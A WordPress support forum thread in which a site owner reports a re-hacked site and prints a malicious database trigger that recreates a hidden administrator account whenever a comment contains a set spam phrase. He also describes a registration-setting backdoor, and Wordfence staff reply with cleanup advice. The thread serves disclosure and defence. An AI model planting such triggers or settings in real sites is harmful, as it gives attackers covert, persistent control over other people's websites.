Support » Plugin: Wordfence Security - Firewall & Malware Scan » Re-Hacked via DB-Trigger

  • Resolved Chris

    (@bundfegadmin)


    Hi there,
    I just helped a friend with a hacked website. It was round 2, because we had removed the false-admin-account (wp-admin | wp-security@hotmail.com – seems to be a known hacker-account) and deleted/repaired all hacked files.
    When the account appeared again I looked deeper into everything.

    I found a trigger (name: after_insert_comment) in the database with the following code:

    BEGIN
         IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
             SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
             SET @nextWpUsersID = @lastInsertWpUsersId + 1;
             INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
             INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
             INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
         END IF;
     END
    

    I found the same trigger in three databases in the same webspace and wonder in how many pages this trigger is waiting.
    Is there any way that wordfence could be able to find db-triggers and show them in the scan?

    PS: the pw-hash was the same in all triggers so bruteforcing it could be pretty interesting since you could get access to a lot of sites (I changed it just a bit ;-))

    • This topic was modified 4 weeks, 1 day ago by Chris. Reason: typo
    • This topic was modified 4 weeks, 1 day ago by Chris. Reason: grammar
Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter Chris

    (@bundfegadmin)

    PPS: Another backdoor I stumbled apon a few years ago, and wordfence could potentially warn about: In wordpress-settings “Membership – Anyone can register” was checked and “New User Default Role” was “Administrator”. I even think wordpress should prevent this setting in its core…

    Hey @bundfegadmin,

    Regarding your concern (second comment), you’re absolutely right.

    Your concern has already been presented to the WordPress Core Trac Team and is still active. For details, see WordPress Core Ticket No. 43936.

    Hope this helps.

    Cheerio!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @bundfegadmin, thanks for the detailed information about what you’d had to fix in this case.

    I have mentioned this to our team and I believe a check for this specific malware is being discussed although I can’t provide ongoing updates here on the forums.

    I’ll just provide our site-cleaning documents below for reference just in case any checks have been missed or may help in future: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Make sure WordPress core and all of your plugins and themes are updated. Also, as the database triggers were affected in this case, update your passwords for the hosting control panel, FTP, WordPress admin users, and database.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    Thanks,

    Peter.

    Thread Starter Chris

    (@bundfegadmin)

    Hi folks,

    @generosus thanks for the post in the mentioned ticket. Are these times normal? That started 5 year ago. I am really not familiar with this community 😉

    @wfpeter thanks for considering it. Good luck to your team. And thanks for the fine Learning Center. I will look into it 🙂

    Chris

Viewing 4 replies - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.